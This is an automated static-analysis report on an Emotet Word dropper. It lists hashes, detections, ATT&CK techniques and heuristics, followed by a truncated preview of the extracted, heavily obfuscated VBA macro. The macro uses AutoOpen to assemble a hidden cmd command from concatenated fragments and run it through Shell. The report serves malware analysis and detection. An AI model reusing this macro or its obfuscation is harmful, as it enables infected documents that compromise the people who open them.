Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 0283ba2ff0fed9cd…

MALICIOUS

Office (OLE)

Size: 178.1 KB · Created: 2018-07-25 14:29:00 · Authoring application: Microsoft Office Word · First seen: 2019-03-10
MD5: 449919a8de8c655beb5e3d11e40e680d SHA-1: 719ec092ca46128647b09fa67318c2a3cc46a864 SHA-256: 0283ba2ff0fed9cd4cdf1be1671fc9656a80ee13b526d06eb693611cc1f6860d
Risk Score: 142

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6802950-0', indicating downloader functionality. The presence of an AutoOpen VBA macro, flagged by both 'OLE_VBA_AUTOOPEN' and 'OLE_LEGACY_WORDBASIC_AUTOEXEC', strongly suggests that the macro is designed to execute automatically when the document is opened. The script builds a command string from many concatenated fragments and executes it with the Shell function, most likely to download and run a secondary payload. This matches the typical behavior of Emotet droppers.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6802950-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6802950-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas · Kind: vba-macro · Source: oletools.olevba.extract_macros (decoded VBA source) · Size: 36138 bytes
SHA-256: 42f9a67e0e0b4589107a8d64283fd44155d09c641880ecea255d594515f30ffa
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "amFAQmi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   RRDjV = supwE
   zdIfhH = 560
   ELCdwh = CDbl(7939)
imWiSZUu = "" + jvRYMaoDi + UAkEUfiQVMIiq + CVar("cm") + jTOPkwGDhHS + SFmPslP + bUQuDDOS + RjkcPT + EknRr + YiIbKFwva + AGKuBJC + fqwiqi + fPjGcv + JTWRbmMu + LAvwOopqIQ + iIJMfXwwTa + IiFHUTcDob + dwjJGmo + XjMHGtaQ + AnPXP + czaNXkWuokO + TdnFSFjnwt + fEwfkwjzE + uMScbLVJHS + nioRpLuuw + oUzuI + ZAwJRHd + QRozVm + PFizuVCUbA + XRCzhsm + YAwGf + ZwTKMQ + rwmAUNL + PdkGHTjdCrU + XfOfPVuS + iYhhlsbi + MjrdpLttWTz + zRzuQ + iuwmpik + iMmHOwG + nwaUTIpnsB + spHJJ + vKFhwiC + tqNPAMuzBrr + EMhvZcA + NFpRsij + lDiqIdSjU + jiHKqINjAz + HrlwItq + svJrLupG + sfaRhOQGqHL + wPiSNiMcI + bmjtUoTct + CzBibwPatmFWfo
   NGzZC = qqKSY
   vQrBAq = Int(98)
Shell@ imWiSZUu, 0
   BARbh = ChrW(WQEFEk)
End Sub


Attribute VB_Name = "uouvHKXJZi"
Function bUQuDDOS()
On Error Resume Next
XtujJC = zCsTWa
   XzqnCr = 3
rirYlTAo = "d" + "          "
KJrUQa = FAYNS
VapUcn = "   " + "  /" + "c      " + "         " + "FO"
zGXYzS = "R /" + "F " + CStr(Chr(SUlXQMDh + jvpZWkmTYzivj + 34 + rDVmqSiEwa + ShTShfdcHzt)) + "token" + "s=2" + " delims=" + "P=Mf" + CStr(Chr(ZwjVcWosD + huwZzrsw + 34 + TmFfzPCP + JiTRVziTEGjPH)) + " %d I" + "N ("
wHqpMXoK = "'assoc.cmd" + "')" + "DO " + "%d   /V:" + "      /r"
ptuTIuU = " " + CStr(Chr(mjEiPGuPLFJd + HldqjADafDw + 34 + uVYDfvuKjw + lOPILMVsowUGYa)) + "  s" + "et   " + "  +" + "$="
oAbwZz = Sin(20930 * jcYOW + 3199 / QUEBkB)
   otXCC = VCdfY
   CBGLdC = Fix(HpMvYr)
iFZVbkLSYT = "//-/-\_/\" + "_-\__\ -/_"
poaEn = EBwINL
   EUorfa = FnQFFv
iAVjORf = "-\-/\_-\" + "_\// " + "/_-//\" + "/-\\__-_" + "\ /\-_\" + "-"
zRWZQk = Atn(841)
UUELD = "_/\\_/_/- " + "/--\" + "/\_"
Mthnqz = CSng(ZEzSsj)
   KdjGG = 2650
QLlTBRTkmdr = "/-\_\_/_" + " _\_--/\\" + "/-//\__ \"
bUQuDDOS = rirYlTAo + VapUcn + zGXYzS + wHqpMXoK + ptuTIuU + iFZVbkLSYT + iAVjORf + UUELD + QLlTBRTkmdr
   jcvEu = DwuzM
   KDTnj = ChrB(878)
End Function
Function RjkcPT()
On Error Resume Next
HszmwV = 46
EUZEEAXZHBT = "___/\//\_" + "-\--/ --_/"
utlOA = YtWRw
   JCvUY = Log(nJNpi)
iKzDMifCavj = "\/-_\" + "_\/" + "_\- \_-\\_"
wkdqsTHR = "\/-" + "_-/-/_ _" + "-\_\-" + "_//_\/" + "/\- _/-_-" + "/\\_-"
TMMVpq = "\/\_- \_-_" + "\-/\_\" + "//--/ _" + "_" + "__\-/" + "/" + "\\/\--"
GpzLju = Round(wGAhUO)
   mlwCVr = Haonf
   TBmBu = HmBwq
zEUjCbRBti = "- \/\--_" + "_/-_/\/-" + "_ -_" + "-/\-" + "/_/-\\__\" + " _\_-" + "-\/_//"
mYVGRD = Rnd(GNWHM)
vdXYcdE = "-\-_/" + " /" + "\\-"
WvOrp = 5989
   jfZjz = AnJDm
CrsRShk = "/\\_/--/-" + "__ --/-" + "\" + "-_\" + "__/" + "/_\\}"
uirQuoRCF = "\_-_///-__"
HGYJa = Log(kLCfUw)
   IQXzn = 98
   zIbYP = lfNiHG
wDQjzROS = "-\/\-}-\/" + "/_-_/\-/" + "\\-_{\/_//" + "_-\_\"
RjkcPT = EUZEEAXZHBT + iKzDMifCavj + wkdqsTHR + TMMVpq + zEUjCbRBti + vdXYcdE + CrsRShk + uirQuoRCF + wDQjzROS
   zHjlP = CLng(813)
End Function
Function EknRr()
On Error Resume Next
JaijVRl = "-" + "-\_/h"
ibDNo = 5060
MCjpBbvpAi = "/\_-"
obZoFw = 141
UdptDwCiHD = "-\-//" + "_-_\/_c/--" + "/__-/\\\-_" + "/\t/_/-" + "_-"
OiAsvW = 307123685
   TXzHJT = ChrB(ckJQZo)
tMhwzqnZGB = "\" + "_\/_\--/a/" + "_-\\/_" + "--\/" + "-\/_c\-" + "/"
qwUIPkqkNG = "\_" + "_-///" + "__\\-}" + "_"
EknRr = JaijVRl + MCjpBbvpAi + UdptDwCiHD + tMhwzqnZGB + qwUIPkqkNG
   VIclD = CGzEwZ
   rJLVrR = CDbl(DTrvj)
End Function
Function YiIbKFwva()
On Error Resume Next
UXpYA = CByte(AHEkT)
CktfQ = "_" + "/\_\-_\/" + "\--//" + ";\" + "\--_/"
XAkqp = CdDJOR
   zbsPN = ChrB(59579 * TlaAuk - GZSqE / wUFLwA)
wRHFJwn = "/-_-_\/" + "/_k/-\_-\"
RMJivk = 2
   EkHdV = CSng(16838 / nRwipo + 86246 * fAsiH)
   PXGfpA = RdDUIc
fFBaP = "___/--//"
AaOBv = 7
   ZIWsBH = 19
BCcVYIN = "\a-" + "_--///\" + "-\" + "\/__\e\" + "-\"
sYsiiC = iWisi
   JBQDL = CBool
... (truncated)